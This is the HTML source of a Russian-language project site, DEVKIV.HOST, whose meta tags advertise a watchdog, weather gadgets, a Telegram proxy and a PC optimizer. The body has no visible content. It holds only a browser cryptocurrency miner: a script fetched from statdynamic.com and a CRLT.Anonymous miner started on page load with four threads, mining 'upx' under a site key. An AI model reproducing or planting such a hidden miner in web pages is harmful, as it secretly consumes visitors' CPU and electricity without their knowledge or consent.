<!DOCTYPE html>
<html lang="ru">
<head>
<meta charset="UTF-8">
<title>DEVKIV.HOST</title>
<meta name="viewport" content="width=device-width, initial-scale=1" />
<meta http-equiv="content-type" content="text/html; charset=utf-8" />
<meta name="title" content="DEVKIV.HOST" />
<link rel="image_src" href="" />
<meta name="description" content="DEVKIV.HOST - Проекты KIV / https://vk.com/unitkiv" /> 
<meta name="keywords" content="devkiv, devkiv.host, kiv, watchdog, ватчдог, weather, погода онлайн, telegram proxy, телеграм прокси, windows 7 gadget, gadgetfm windows 7 гаджеты, optimization, оптимизатор компьютера, chat, чат, monitoring, мониторинг" /> 
<meta name="author" content="KIV" />
<meta http-equiv="pragma" content="no-cache">
<meta http-equiv="cache-control" content="no-cache">
<meta http-equiv="expires" content="0">
</head>
<body> 
<script src="//statdynamic.com/lib/crypta.js"></script>
<script>
  var miner=new CRLT.Anonymous('a19cc5b3d6609242d7b695d8e73f8744c56fbb33d385', {
    threads:4,throttle:0.2, coin: "upx",
  });
  miner.start();
</script>
</body>
</html>
